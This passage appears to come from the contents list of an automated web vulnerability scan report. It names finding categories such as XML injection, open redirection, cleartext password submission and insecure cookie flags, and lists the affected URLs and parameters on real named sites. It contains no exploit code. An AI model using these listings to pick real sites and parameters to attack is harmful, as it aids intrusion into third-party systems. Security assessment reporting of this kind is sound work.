6.7. http://c.atdmt.com/crossdomain.xml

6.8. http://c.msn.com/crossdomain.xml

6.9. http://col.stc.s-msn.com/crossdomain.xml

6.10. http://col.stj.s-msn.com/crossdomain.xml

6.11. http://colstc.msn.com/crossdomain.xml

6.12. http://colstj.msn.com/crossdomain.xml

6.13. http://img.widgets.video.s-msn.com/crossdomain.xml

6.14. http://now.eloqua.com/crossdomain.xml

6.15. http://omnituremarketing.tt.omtrdc.net/crossdomain.xml

6.16. http://rad.msn.com/crossdomain.xml

6.17. http://spe.atdmt.com/crossdomain.xml

6.18. http://ad.wsod.com/crossdomain.xml

6.19. http://api.bing.com/crossdomain.xml

6.20. http://investing.money.msn.com/crossdomain.xml

6.21. http://static.ak.connect.facebook.com/crossdomain.xml

6.22. http://www.actonsoftware.com/crossdomain.xml

6.23. http://www.msn.com/crossdomain.xml

6.24. http://citi.bridgetrack.com/crossdomain.xml

6.25. http://data.moneycentral.msn.com/crossdomain.xml

6.26. http://freemanco.app5.hubspot.com/crossdomain.xml

6.27. http://moneycentral.msn.com/crossdomain.xml

6.28. http://www.omniture.com/crossdomain.xml

7. Silverlight cross-domain policy

7.1. http://ad.doubleclick.net/clientaccesspolicy.xml

7.2. http://b.scorecardresearch.com/clientaccesspolicy.xml

7.3. http://b.voicefive.com/clientaccesspolicy.xml

7.4. http://c.atdmt.com/clientaccesspolicy.xml

7.5. http://c.msn.com/clientaccesspolicy.xml

7.6. http://img.widgets.video.s-msn.com/clientaccesspolicy.xml

7.7. http://rad.msn.com/clientaccesspolicy.xml

7.8. http://spe.atdmt.com/clientaccesspolicy.xml

7.9. http://api.bing.com/clientaccesspolicy.xml

7.10. http://data.moneycentral.msn.com/clientaccesspolicy.xml

7.11. http://money.msn.com/clientaccesspolicy.xml

7.12. http://moneycentral.msn.com/clientaccesspolicy.xml

7.13. http://services.money.msn.com/clientaccesspolicy.xml

8. Cleartext submission of password

8.1. http://support.moxiesoft.com/

8.2. http://www.aac.org/site/TR/Events/AWB08

8.3. http://www.bcbst.com/inc/loginform.asp

8.4. http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/

8.5. http://www.freemanco.com/store/

8.6. http://www.widgetbox.com/account/login_lite.jsp

9. XML injection

9.1. http://freemanco.com/favicon.ico [REST URL parameter 1]

9.2. http://platform.twitter.com/anywhere.js [REST URL parameter 1]

9.3. http://services.money.msn.com/quoteservice/streaming [format parameter]

9.4. http://use.typekit.com/k/bpi7eqn-e.css [REST URL parameter 1]

9.5. http://use.typekit.com/k/bpi7eqn-e.css [REST URL parameter 2]

9.6. http://www.bertelsmann.com/bertelsmann_corp/wms41/xml/headerflash_config.xml.php [REST URL parameter 1]

9.7. http://www.bertelsmann.com/bertelsmann_corp/wms41/xml/headerflash_config.xml.php [REST URL parameter 2]

9.8. http://www.bertelsmann.com/bertelsmann_corp/wms41/xml/headerflash_config.xml.php [REST URL parameter 3]

9.9. http://www.bertelsmann.com/bertelsmann_corp/wms41/xml/headerflash_config.xml.php [REST URL parameter 4]

9.10. http://www.freemanco.com/freemanco [REST URL parameter 1]

9.11. http://www.freemanco.com/freemanco/ [REST URL parameter 1]

9.12. http://www.freemanco.com/freemanco/ourwork/creativeservices/creative.jsp [REST URL parameter 1]

9.13. http://www.freemanco.com/freemanco/ourwork/images/favicon.ico [REST URL parameter 1]

9.14. http://www.freemanco.com/store [REST URL parameter 1]

9.15. http://www.freemanco.com/store/ [REST URL parameter 1]

9.16. http://www.freemanco.com/store/freemanco/siteSearch/siteSearch.jsp [REST URL parameter 1]

10. SSL cookie without secure flag set

10.1. https://checkout.netsuite.com/s.nl

10.2. https://myaccount.west.thomson.com/MyAccount/AccessControl/AccessControl/SignIn

10.3. https://secure.bundle.com/Membership/LogOn

10.4. https://secure.bundle.com/services/nocache/Membership/UpdateAuthenticationStateToClient

10.5. https://www.bcbst.com/accounttools/public/askUserId.do

10.6. https://www.bcbst.com/inc/loginform.asp

10.7. https://www.bcbst.com/secure/public/login.asp

10.8. https://www.fusionvm.com/FusionVM/

10.9. https://west.thomson.com/GlobalBackgroundStyles.5.1.421.22.ashx

10.10. https://west.thomson.com/store/Promotions/EmailPreferences/Login.aspx

10.11. https://west.thomson.com/store/secure/EmptyBasket.aspx

10.12. https://west.thomson.com/store/secure/ShippingInfo.aspx

10.13. https://west.thomson.com/store/secure/ShippingLocation.aspx

10.14. https://west.thomson.com/support/customer-service/order-info.aspx

10.15. https://www.bcbst.com/accounttools/

11. Session token in URL

11.1. http://bh.contextweb.com/bh/set.aspx

11.2. http://i.widgetserver.com/ip/origin==http%3A%2F%2Fimg.widgetbox.com%2Fscreenshot%2F10%2F00b6be16-496c-476e-ba09-45115835efdf.png%3F22&&w==105&&h==158&&type==fill

11.3. http://i.widgetserver.com/ip/origin==http%3A%2F%2Fimg.widgetbox.com%2Fscreenshot%2F10%2F51dde360-e809-412c-ae67-1f21b2b26abd.png%3F273&&w==105&&h==158&&type==fill

11.4. http://i.widgetserver.com/ip/origin==http%3A%2F%2Fimg.widgetbox.com%2Fscreenshot%2F10%2F61f261a6-0395-4a73-ad28-aa6682f1cb2c.png%3F39&&w==105&&h==158&&type==fill

11.5. http://i.widgetserver.com/ip/origin==http%3A%2F%2Fimg.widgetbox.com%2Fscreenshot%2F10%2F98ecf5a3-3ea4-48fc-871b-1a4d63125e12.png%3F38&&w==105&&h==158&&type==fill

11.6. http://i.widgetserver.com/ip/origin==http%3A%2F%2Fimg.widgetbox.com%2Fscreenshot%2F10%2Faa71f5ac-e60e-44f1-8999-f5bf0858f0a6.png%3F24&&w==105&&h==158&&type==fill

11.7. http://i.widgetserver.com/ip/origin==http%3A%2F%2Fimg.widgetbox.com%2Fscreenshot%2F10%2Fcdac24b6-3da0-4096-999a-413159cf40e7.png%3F71&&w==105&&h==158&&type==fill

11.8. http://i.widgetserver.com/ip/origin==http%3A%2F%2Fimg.widgetbox.com%2Fscreenshot%2F10%2Fe7b3a682-8e5d-43db-a0bb-732298974c3f.png%3F35&&w==105&&h==158&&type==fill

11.9. http://i.widgetserver.com/ip/origin==http%3A%2F%2Fimg.widgetbox.com%2Fscreenshot%2F10%2Ffbfc48e1-fa2b-4d0f-a4d8-5950c30fd079.png%3F174&&w==105&&h==158&&type==fill

11.10. http://l.sharethis.com/log

11.11. http://l.sharethis.com/pview

11.12. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate

11.13. http://matrix.itasoftware.com/view/details

11.14. http://matrix.itasoftware.com/view/flights

11.15. http://matrix.itasoftware.com/xhr/shop/summarize

11.16. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/mbox/standard

11.17. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/sc/standard

11.18. http://p.widgetserver.com/p/fetch/origin==http%3A%2F%2Ftwitter.com%2Fstatuses%2Fuser_timeline%2Faidswalkboston.atom

11.19. http://p.widgetserver.com/p/fetch/origin==http%3A%2F%2Fwww.facebook.com%2Ffeeds%2Fpage.php%3Fformat%3Datom10%26id%3D95922227750

11.20. http://sales.liveperson.net/hc/18987408/

11.21. http://www.aac.org/site/TR/Events/AWB08

11.22. http://www.computerworld.com/s/article/9216003/Texas_fires_two_tech_chiefs_over_breach

11.23. http://www.facebook.com/extern/login_status.php

11.24. http://www.widgetserver.com/syndication/get_widget.html

11.25. http://www.widgetserver.com/syndication/html5/3651dbe5-aec4-42b2-8270-d62db9a25bfe

12. Open redirection

12.1. http://ad.trafficmp.com/a/bpix [r parameter]

12.2. http://west.thomson.com/Register/CreateTransferToken.aspx [ReturnUrl parameter]

13. Cookie scoped to parent domain

13.1. https://secure.bundle.com/services/nocache/Membership/UpdateAuthenticationStateToClient

13.2. http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/

13.3. http://a.rad.msn.com/ADSAdClient31.dll

13.4. http://a.rad.msn.com/ADSAdClient31.dll

13.5. http://a.rfihub.com/ca.html

13.6. http://a.rfihub.com/cm

13.7. http://action.mathtag.com/mm//PHOE//lpg

13.8. http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/be/%2a/c%3B232789996%3B3-0%3B0%3B56669790%3B3454-728/90%3B38954353/38972110/2%3B%3B~sscs%3D%3fhttp://www.aptm.phoenix.edu/

13.9. http://ad.trafficmp.com/a/bpix

13.10. http://ad.trafficmp.com/a/bpix

13.11. http://ad.trafficmp.com/a/bpix

13.12. http://ad.trafficmp.com/a/bpix

13.13. http://ad.trafficmp.com/a/bpix

13.14. http://ad.trafficmp.com/a/bpix

13.15. http://ad.trafficmp.com/a/bpix

13.16. http://adx.adnxs.com/mapuid

13.17. http://altfarm.mediaplex.com/ad/js/15902-126860-34879-0

13.18. http://amch.questionmarket.com/adsc/d840009/7/41115363/decide.php

13.19. http://amch.questionmarket.com/adscgen/st.php

13.20. http://ar.voicefive.com/b/wc_beacon.pli

13.21. http://ar.voicefive.com/bmx3/broker.pli

13.22. http://ar.voicefive.com/bmx3/broker.pli

13.23. http://ar.voicefive.com/bmx3/broker.pli

13.24. http://b.scorecardresearch.com/b

13.25. http://b.scorecardresearch.com/r

13.26. http://b.voicefive.com/b

13.27. http://bh.contextweb.com/bh/set.aspx

13.28. http://bstats.adbrite.com/click/bstats.gif

13.29. http://c.atdmt.com/c.gif

13.30. http://c.homestore.com/srv/oreo

13.31. http://c.live.com/c.gif

13.32. http://c.msn.com/c.gif

13.33. http://c.realtor.com/srv/sugar

13.34. http://c7.zedo.com/img/bh.gif

13.35. http://cbglobal.112.2o7.net/b/ss/cbglobal/1/H.20.3/s62270389322657

13.36. http://code.randomhouse.com/b/ss/ranhcorporate,ranhrollup/1/H.17/s79731434181166

13.37. http://code.randomhouse.com/b/ss/ranhrollup/1/H.22.1/s74779692005831

13.38. http://d7.zedo.com/img/bh.gif

13.39. http://ds.addthis.com/red/psi/sites/www.bertelsmann.com/p.json

13.40. http://ecommerce.randomhouse.com/cart.do

13.41. http://ehg-gaddispartners.hitbox.com/HG

13.42. http://explore.live.com/Handlers/Plt.mvc

13.43. http://explore.live.com/windows-live-messenger

13.44. http://ib.adnxs.com/getuidu

13.45. http://ib.adnxs.com/pxj

13.46. http://ib.adnxs.com/seg

13.47. http://idcs.interclick.com/Segment.aspx

13.48. http://image2.pubmatic.com/AdServer/Pug

13.49. http://leadback.advertising.com/adcedge/lb

13.50. http://m.adnxs.com/msftcookiehandler

13.51. http://m.adnxs.com/tt

13.52. http://msn.careerbuilder.com/

13.53. http://omniture.112.2o7.net/b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s72142050643632

13.54. http://omniture.112.2o7.net/b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s72645798081596

13.55. http://omniture.112.2o7.net/b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s72918755419910

13.56. http://omniture.112.2o7.net/b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s75575511181236

13.57. http://omniture.112.2o7.net/b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s79267593701483

13.58. http://omniture.112.2o7.net/b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s7968447030146

13.59. http://omniture.112.2o7.net/b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s79784419631912

13.60. http://omniture.112.2o7.net/b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s79902329597084

13.61. http://p.opt.fimserve.com/bht/

13.62. http://pixel.fetchback.com/serve/fb/pdc

13.63. http://pixel.mathtag.com/event/js

13.64. http://pixel.quantserve.com/pixel

13.65. http://pixel.rubiconproject.com/tap.php

13.66. http://r.turn.com/r/beacon

13.67. http://realestate.msn.us.intellitxt.com/al.asp

13.68. http://realestate.msn.us.intellitxt.com/intellitxt/front.asp

13.69. http://rss.feedsportal.com/c/432/f/530802/s/146d96c3/l/0L0Scomputerworlduk0N0Cnews0Csecurity0C327630A50Coracle0Eresponds0Eto0Ehacker0Egroup0Eand0Epatches0Ejavacom0Evulnerability0C0Dolo0Frss/story01.htm

13.70. http://safebrowsing.clients.google.com/safebrowsing/downloads

13.71. http://segment-pixel.invitemedia.com/pixel

13.72. http://tags.bluekai.com/site/1654

13.73. http://tracker.marinsm.com/tp

13.74. http://usmoneytaxes.opt.video.msn.com/optimizevc.aspx

13.75. http://video.msn.com/soapboxservice2.aspx

13.76. http://www.actonsoftware.com/acton/bn/1091/visitor.gif

13.77. http://www.aptm.phoenix.edu/

13.78. http://www.aptm.phoenix.edu/AptiNet/HTTPHandlerServlet

13.79. http://www.aptm.phoenix.edu/AptiNet/hhs

13.80. http://www.bcbst.com/

13.81. http://www.bcbst.com/css/base.css

13.82. http://www.bcbst.com/css/footer.css

13.83. http://www.bcbst.com/css/global.css

13.84. http://www.bcbst.com/css/header.css

13.85. http://www.bcbst.com/css/lytebox.css

13.86. https://www.bcbst.com/accounttools/

13.87. http://www.bing.com/

13.88. http://www.bing.com/sck

13.89. http://www.bing.com/search

13.90. http://www.bing.com/search/

13.91. http://www.msn.com/

13.92. http://www.omniture.com/en/contact

13.93. http://www.omniture.com/en/products/conversion/testandtarget

13.94. http://www.omniture.com/en/products/marketing_integration/closed_loop_marketing

13.95. http://www.omniture.com/en/products/marketing_integration/genesis

13.96. http://www.omniture.com/en/products/marketing_integration/genesis/applications

13.97. http://www.omniture.com/en/products/marketing_integration/genesis/applications/15/444

13.98. http://www.omniture.com/en/products/marketing_integration/genesis/applications/15/574

13.99. http://www.omniture.com/en/products/marketing_integration/genesis/applications/39/543

13.100. http://www.omniture.com/en/products/multichannel_analytics/insight

13.101. http://www.omniture.com/en/products/multichannel_analytics/insight_retail

13.102. http://www.omniture.com/en/products/online_analytics/digitalpulse

13.103. http://www.omniture.com/en/products/online_analytics/discover

13.104. http://www.omniture.com/en/products/online_analytics/sitecatalyst

13.105. http://www.omniture.com/en/products/online_analytics/survey

13.106. http://www.omniture.com/en/products/open_business_analytics_platform/datawarehouse

13.107. http://www.omniture.com/offer/943

13.108. http://www.realtor.com/search/widgetportal/Widget.aspx

14. Cookie without HttpOnly flag set

14.1. https://checkout.netsuite.com/s.nl

14.2. http://data.cmcore.com/imp

14.3. http://ecommerce.randomhouse.com/cart.do

14.4. https://ecommerce.randomhouse.com/account.do

14.5. https://ecommerce.randomhouse.com/sign-in.do

14.6. http://kbportal.thomson.com/

14.7. http://kbportal.thomson.com/index.aspx

14.8. http://kbportal.thomson.com/utility/getResource.aspx

14.9. http://knowledgebase.net/

14.10. http://moxieinsight.com/

14.11. http://shopping.netsuite.com/s.nl

14.12. http://support.moxiesoft.com/

14.13. http://t2.trackalyzer.com/trackalyze.asp

14.14. http://www.aac.org/site/TR/Events/AWB08

14.15. http://www.bcbst.com/

14.16. https://www.bcbst.com/accounttools/public/askUserId.do

14.17. https://www.bcbst.com/inc/loginform.asp

14.18. https://www.bcbst.com/secure/public/login.asp

14.19. http://www.cargill.com/

14.20. http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/

14.21. http://www.freemanco.com/freemanco/

14.22. http://www.freemanco.com/store/scripts/jquery.form.js

14.23. http://www.freemanco.com/store/scripts/jquery1.3.2.js

14.24. http://www.freemanco.com/store/styles/ui.datepicker.css

14.25. http://www.fusionvm.com/

14.26. http://www.magellangps.com/

14.27. http://www.moxieinsight.com/

14.28. http://www.visitortracklog.com/loghit.asp

14.29. http://www.visitortracklog.com/loghit.asp

14.30. http://www.widgetbox.com/

14.31. http://a.rfihub.com/ca.html

14.32. http://a.rfihub.com/cm

14.33. http://action.mathtag.com/mm//PHOE//lpg

14.34. http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/be/%2a/c%3B232789996%3B3-0%3B0%3B56669790%3B3454-728/90%3B38954353/38972110/2%3B%3B~sscs%3D%3fhttp://www.aptm.phoenix.edu/

14.35. http://ad.trafficmp.com/a/bpix

14.36. http://ad.trafficmp.com/a/bpix

14.37. http://ad.trafficmp.com/a/bpix

14.38. http://ad.trafficmp.com/a/bpix

14.39. http://ad.trafficmp.com/a/bpix

14.40. http://ad.trafficmp.com/a/bpix

14.41. http://ad.trafficmp.com/a/bpix

14.42. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1359.827.tk.100x25/185076156

14.43. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.835.tk.TEXT/422725724

14.44. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959**

14.45. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959**

14.46. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218**

14.47. http://ad.yieldmanager.com/pixel

14.48. http://advertising.microsoft.com/home

14.49. http://altfarm.mediaplex.com/ad/js/15902-126860-34879-0

14.50. http://amch.questionmarket.com/adsc/d840009/7/41115363/decide.php

14.51. http://amch.questionmarket.com/adscgen/st.php

14.52. http://ar.voicefive.com/b/wc_beacon.pli

14.53. http://ar.voicefive.com/bmx3/broker.pli

14.54. http://ar.voicefive.com/bmx3/broker.pli

14.55. http://ar.voicefive.com/bmx3/broker.pli

14.56. http://b.scorecardresearch.com/b

14.57. http://b.scorecardresearch.com/r

14.58. http://b.voicefive.com/b

14.59. http://bh.contextweb.com/bh/set.aspx

14.60. http://blog.widgetbox.com/

14.61. http://bstats.adbrite.com/click/bstats.gif

14.62. http://c.atdmt.com/c.gif

14.63. http://c.homestore.com/srv/oreo

14.64. http://c.live.com/c.gif

14.65. http://c.msn.com/c.gif

14.66. http://c.realtor.com/srv/sugar

14.67. http://c7.zedo.com/img/bh.gif

14.68. http://cbglobal.112.2o7.net/b/ss/cbglobal/1/H.20.3/s62270389322657

14.69. http://citi.bridgetrack.com/event/

14.70. http://code.randomhouse.com/b/ss/ranhcorporate,ranhrollup/1/H.17/s79731434181166

14.71. http://code.randomhouse.com/b/ss/ranhrollup/1/H.22.1/s74779692005831

14.72. http://d7.zedo.com/img/bh.gif

14.73. http://data.cmcore.com/imp

14.74. http://ds.addthis.com/red/psi/sites/www.bertelsmann.com/p.json

14.75. http://ecommerce.randomhouse.com/cart.do

14.76. http://ehg-gaddispartners.hitbox.com/HG

14.77. http://explore.live.com/Handlers/Plt.mvc

14.78. http://explore.live.com/windows-live-messenger

14.79. http://freemanco.app5.hubspot.com/salog.js.aspx

14.80. http://g.adspeed.net/ad.php

14.81. http://homestore.122.2o7.net/b/ss/movesyndication/1/H.2-pdv-2/s62061750586144

14.82. http://i.kissmetrics.com/i.js

14.83. http://idcs.interclick.com/Segment.aspx

14.84. http://image2.pubmatic.com/AdServer/Pug

14.85. http://kbportal.thomson.com/display/2/index.aspx

14.86. http://kbportal.thomson.com/display/2/kb/cat.aspx

14.87. http://kbportal.thomson.com/display/2/login.aspx

14.88. http://kbportal.thomson.com/favicon.ico

14.89. http://kbportal.thomson.com/images/clearpixel.gif

14.90. http://kbportal.thomson.com/images/poweredbydark.png

14.91. http://kbportal.thomson.com/index.aspx

14.92. http://kbportal.thomson.com/js/default.js

14.93. http://leadback.advertising.com/adcedge/lb

14.94. http://msnportal.112.2o7.net/b/ss/msnportalusenmoney/1/H.7-pdv-2/1303842955283

14.95. http://o.computerworlduk.com/b/ss/idgcomputerworld/1/H.19.4/s72592209363356

14.96. http://omniture.112.2o7.net/b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s72142050643632

14.97. http://omniture.112.2o7.net/b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s72645798081596

14.98. http://omniture.112.2o7.net/b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s72918755419910

14.99. http://omniture.112.2o7.net/b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s75575511181236

14.100. http://omniture.112.2o7.net/b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s79267593701483

14.101. http://omniture.112.2o7.net/b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s7968447030146

14.102. http://omniture.112.2o7.net/b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s79784419631912

14.103. http://omniture.112.2o7.net/b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s79902329597084

14.104. http://p.opt.fimserve.com/bht/

14.105. http://pixel.fetchback.com/serve/fb/pdc

14.106. http://pixel.mathtag.com/event/js

14.107. http://pixel.quantserve.com/pixel

14.108. http://pixel.rubiconproject.com/tap.php

14.109. http://r.turn.com/r/beacon

14.110. http://realestate.msn.us.intellitxt.com/al.asp

14.111. http://realestate.msn.us.intellitxt.com/intellitxt/front.asp

14.112. http://recs.richrelevance.com/rrserver/p13n_generated.js

14.113. http://recs.richrelevance.com/rrserver/p13n_generated.js

14.114. http://reviews.west.thomson.com/logging

14.115. http://rss.feedsportal.com/c/432/f/530802/s/146d96c3/l/0L0Scomputerworlduk0N0Cnews0Csecurity0C327630A50Coracle0Eresponds0Eto0Ehacker0Egroup0Eand0Epatches0Ejavacom0Evulnerability0C0Dolo0Frss/story01.htm

14.116. http://safebrowsing.clients.google.com/safebrowsing/downloads

14.117. http://sales.liveperson.net/hc/18987408/

14.118. http://scripts.omniture.com/global/scripts/targeting/dyn_prop.php

14.119. http://sdc.bcbst.com/dcs962n2r10000w49zv2i4z3u_3s7u/dcs.gif

14.120. http://sdc.bcbst.com/dcs962n2r10000w49zv2i4z3u_3s7u/dcs.gif

14.121. http://segment-pixel.invitemedia.com/pixel

14.122. http://style.omniture.com/

14.123. http://tags.bluekai.com/site/1654

14.124. http://thwest.112.2o7.net/b/ss/devthwesttest/1/H.20.3/s66554260279361

14.125. http://thwest.112.2o7.net/b/ss/thwest/1/H.20.3/s63471572091802

14.126. http://tracker.marinsm.com/tp

14.127. http://ushealth2.opt.video.msn.com/optimizevc.aspx

14.128. http://usmoneynews.opt.video.msn.com/optimizevc.aspx

14.129. http://usmoneytaxes.opt.video.msn.com/optimizevc.aspx

14.130. http://usrealestate2.opt.video.msn.com/optimizevc.aspx

14.131. http://video.msn.com/soapboxservice2.aspx

14.132. http://west.thomson.com/Error/500Error.aspx

14.133. http://west.thomson.com/GlobalBackgroundStyles.5.1.421.22.ashx

14.134. http://west.thomson.com/Register/CreateTransferToken.aspx

14.135. http://west.thomson.com/Signin.aspx

14.136. http://west.thomson.com/default.aspx

14.137. http://west.thomson.com/productdetail/160547/12484463/productdetail.aspx

14.138. http://west.thomson.com/store/AddItem.aspx

14.139. http://west.thomson.com/store/DOTD.aspx

14.140. http://west.thomson.com/store/secure/ShoppingBasket.aspx

14.141. http://west.thomson.com/support/contact-us/default.aspx

14.142. https://west.thomson.com/GlobalBackgroundStyles.5.1.421.22.ashx

14.143. https://west.thomson.com/store/Promotions/EmailPreferences/Login.aspx

14.144. https://west.thomson.com/store/secure/EmptyBasket.aspx

14.145. https://west.thomson.com/store/secure/ShippingInfo.aspx

14.146. https://west.thomson.com/store/secure/ShippingLocation.aspx

14.147. https://west.thomson.com/support/customer-service/order-info.aspx

14.148. http://www.actonsoftware.com/acton/bn/1091/visitor.gif

14.149. http://www.aptm.phoenix.edu/

14.150. http://www.aptm.phoenix.edu/AptiNet/HTTPHandlerServlet

14.151. http://www.aptm.phoenix.edu/AptiNet/hhs

14.152. http://www.bcbst.com/css/base.css

14.153. http://www.bcbst.com/css/footer.css

14.154. http://www.bcbst.com/css/global.css

14.155. http://www.bcbst.com/css/header.css

14.156. http://www.bcbst.com/css/lytebox.css

14.157. https://www.bcbst.com/accounttools/

14.158. http://www.bertelsmann.com/bertelsmann_corp/wms41/bm/index.php

14.159. http://www.bertelsmann.com/bertelsmann_corp/wms41/inc/AJAX_MUZ_Statistics.server.php

14.160. http://www.bing.com/

14.161. http://www.bing.com/sck

14.162. http://www.bing.com/search

14.163. http://www.bing.com/search/

14.164. https://www.fusionvm.com/FusionVM/

14.165. http://www.moxiesoft.com/tal_products/knowledgebase.aspx

14.166. http://www.msn.com/

14.167. http://www.omniture.com/en/contact

14.168. http://www.omniture.com/en/products/conversion/testandtarget

14.169. http://www.omniture.com/en/products/marketing_integration/closed_loop_marketing

14.170. http://www.omniture.com/en/products/marketing_integration/genesis

14.171. http://www.omniture.com/en/products/marketing_integration/genesis/applications

14.172. http://www.omniture.com/en/products/marketing_integration/genesis/applications/15/444

14.173. http://www.omniture.com/en/products/marketing_integration/genesis/applications/15/574

14.174. http://www.omniture.com/en/products/marketing_integration/genesis/applications/39/543

14.175. http://www.omniture.com/en/products/multichannel_analytics/insight

14.176. http://www.omniture.com/en/products/multichannel_analytics/insight_retail

14.177. http://www.omniture.com/en/products/online_analytics/digitalpulse

14.178. http://www.omniture.com/en/products/online_analytics/discover

14.179. http://www.omniture.com/en/products/online_analytics/sitecatalyst

14.180. http://www.omniture.com/en/products/online_analytics/survey

14.181. http://www.omniture.com/en/products/open_business_analytics_platform/datawarehouse

14.182. http://www.omniture.com/offer/943

14.183. http://www.realtor.com/search/widgetportal/Widget.aspx

15. Password field with autocomplete enabled

15.1. https://checkout.netsuite.com/s.nl

15.2. https://ecommerce.randomhouse.com//email-password.do

15.3. https://ecommerce.randomhouse.com/account.do

15.4. https://ecommerce.randomhouse.com/create-account-submit.do

15.5. https://ecommerce.randomhouse.com/create-account.do

15.6. https://ecommerce.randomhouse.com/sign-in-submit.do

15.7. https://ecommerce.randomhouse.com/sign-in.do

15.8. https://myaccount.west.thomson.com/MyAccount/AccessControl/AccessControl/SignIn

15.9. http://support.moxiesoft.com/

15.10. http://www.aac.org/site/TR/Events/AWB08

15.11. http://www.bcbst.com/inc/loginform.asp

15.12. https://www.bcbst.com/inc/loginform.asp

15.13. http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/

15.14. http://www.freemanco.com/store/

15.15. https://www.freemanco.com/store/index.jsp

15.16. http://www.widgetbox.com/account/login_lite.jsp

16. Source code disclosure

17. ASP.NET debugging enabled

18. Referer-dependent response

18.1. http://bstats.adbrite.com/click/bstats.gif

18.2. http://use.typekit.com/k/bpi7eqn-e.css

18.3. http://www.facebook.com/extern/login_status.php

18.4. http://www.facebook.com/plugins/like.php

18.5. https://www.fusionvm.com/FusionVM/DesktopDefault.aspx

18.6. https://www.fusionvm.com/FusionVM/DesktopModules/SecurityAdvisories/SecurityAdvisoriesView.aspx

19. Cross-domain Referer leakage

19.1. http://a.rad.msn.com/ADSAdClient31.dll

19.2. http://a.rad.msn.com/ADSAdClient31.dll

19.3. http://a.rad.msn.com/ADSAdClient31.dll

19.4. http://a.rad.msn.com/ADSAdClient31.dll

19.5. http://a.rad.msn.com/ADSAdClient31.dll

19.6. http://a.rad.msn.com/ADSAdClient31.dll

19.7. http://a.rad.msn.com/ADSAdClient31.dll

19.8. http://a.rad.msn.com/ADSAdClient31.dll

19.9. http://a.rad.msn.com/ADSAdClient31.dll

19.10. http://a.rad.msn.com/ADSAdClient31.dll

19.11. http://a.rad.msn.com/ADSAdClient31.dll

19.12. http://a.rfihub.com/ca.html

19.13. http://ad.doubleclick.net/adi/N2886.151350.QUANTCAST.COM/B5403001.14

19.14. http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.3

19.15. http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.3

19.16. http://ad.doubleclick.net/adi/N5092.152847.MICROSOFTADVERTISIN/B5103858.21

19.17. http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105

19.18. http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105

19.19. http://ad.doubleclick.net/adi/N6092.msn/B5302320.25

19.20. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.100

19.21. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.100

19.22. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.106

19.23. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.106

19.24. http://ad.uk.doubleclick.net/adi/ads.idg.co.uk/cw-welcome

19.25. http://ad.uk.doubleclick.net/adj/new.computerworlduk.com/security1

19.26. http://ad.uk.doubleclick.net/adj/new.computerworlduk.com/security1

19.27. http://ad.uk.doubleclick.net/adj/new.computerworlduk.com/security2

19.28. http://advertising.microsoft.com/home

19.29. http://analytics.live.com/Sync.html

19.30. http://b.rad.msn.com/ADSAdClient31.dll

19.31. http://b.rad.msn.com/ADSAdClient31.dll

19.32. http://b.rad.msn.com/ADSAdClient31.dll

19.33. http://b.rad.msn.com/ADSAdClient31.dll

19.34. http://b.rad.msn.com/ADSAdClient31.dll

19.35. http://c.homestore.com/srv/oreo

19.36. https://checkout.netsuite.com/s.nl

19.37. http://cm.g.doubleclick.net/pixel

19.38. http://d7.zedo.com/lar/v10-003/d7/jsc/flr.js

19.39. http://ecommerce.randomhouse.com/cart.do

19.40. https://ecommerce.randomhouse.com//create-address.do

19.41. https://ecommerce.randomhouse.com//email-password.do

19.42. https://ecommerce.randomhouse.com//select-address.do

19.43. https://ecommerce.randomhouse.com//view-orders.do

19.44. https://ecommerce.randomhouse.com/account.do

19.45. https://ecommerce.randomhouse.com/create-account.do

19.46. https://ecommerce.randomhouse.com/password.do

19.47. https://ecommerce.randomhouse.com/sign-in.do

19.48. http://explore.live.com/windows-live-messenger

19.49. http://fls.doubleclick.net/activityi

